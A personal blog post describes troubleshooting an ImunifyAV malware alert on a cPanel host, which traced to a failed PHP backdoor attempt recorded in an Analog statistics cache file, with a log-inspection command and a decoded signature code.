The virus alert message to start the day.
In August 2020, ImunifyAV reported that it found malware in a file on my website. Troubleshooting a virus alert from ImunifyAV became that day’s task. These are the steps I took to correct the problem.
I found this because, on a regular basis I check my system logs for possible problems. Today, I found a spotted a potential problem and investigated it.
The software versions involved.
The following are the impacted software packages and versions I am running in my environment.
- imunifyAV 4.9.6-8
- cPanel 88.0.13
- Analog 6.0
Where to find the logs and what it reported
To find the imunifyAV dashboard within cPanel, go to HOME >> Plugins >> ImunifyAV
Under the user tab ImunifyAV reports one threat and provides the account associated with the threat.
Under the Files Tab it lists the infected file. In this case it reports the following information.
Scan Date: August 10, 2020 5:49 PM Username: $user File: /home/$user/tmp/analog/cache Reason: SMW-INJ-04278-php.bkdr-7 Status: Infected
Decoding the imunifyAV Reason code and Info on the class of malware
To decode the imunifyAV reason codes, see imunifyAV Documentation. The following is this malware alert decoded.
SMW - Server Malware INJ - Injection 04278 is the ID number of the signature php.bkdr is the category and class of the malware 7 is the version number of signature
The virus flagged is a PHP Backdoor. If you are concerned you already have a PHP or WordPress backdoor, check out this Article on WPSec.
The flagged file and it’s use
The directory /home/$user/tmp/analog is storage for Analog statistics files are housed. And the cache file is where Analog statistics stores all of it’s data.
If you look at the header to the file you will see the following
CACHE type 5 produced by analog 6.0/Unix. Do not modify or delete!
This cache file can grow very large – For a discussion on deleting the file on cpanel forums see this post. http://forums.cpanel.net/f5/analog-stat … 12066.html
If you delete the file, analog will just recreate it. You will lose all the statistics gathered up until the time you delete it, but afterwards analog will continue to collect statistics and save them to that file.
Web Log Analyzers on cPanel
cPanel provides three different web log analysis programs: Awstats, Analog Stats and Webalizer. Analog does not have the support as the others have, with the last major update in December 2004. See Wikipedia: Analog (program) for more details.
The Analog Stats application
The analog configuration on a cPanel host can be found here.
For documentation for Analog – check out Analog GSP Readme.
If you don’t plan to use Analog, you can disable caching using the following command in analog.cfg
This will disable it for all users on the host, so this must be done by the host admin.
Reading the analog cache file
To further research this I looked into the contents of the cache file, to see what triggered the virus alert message. The following is a rough translation of the various record types within the cache file. Of concern is record type 1. And the information passed to the web server on the URL.
- D Date range
- 1. File requested; field 14 is the file requested
- 2. Not used
- 3. Referer url
- 4. Browser info
- 5. Ip Address
- z appears to be date info
- c server response code 200,301, 302, 404, etc
For a list of all of the URL’s, use this command. A review of the cache.out shows that a potential virus payload was included in the URL sent to the server.
grep -v 184 cache|grep "^1" |cut -f13|sort -n >cache.out
Corrective Action Taken
In the end I felt comfortable that is was a non-threat. I cleared out the file using the following command. It will still produce reports, but only using the current logs and not any cached data. Overtime, it will rebuild the logs with new data.
At the end of the day, Troubleshooting a virus alert from ImunifyAV turned out to be quick task.
A hacker had entered backdoor code in a url, it failed, but the attempt was recorded in the log stats. If it occurs again, I will just disable Analog Stats and rely upon Webalizer or AwStats.
My next task is to review the three Web Analyzers installed on the host and decide if I even need to keep Analog Stats.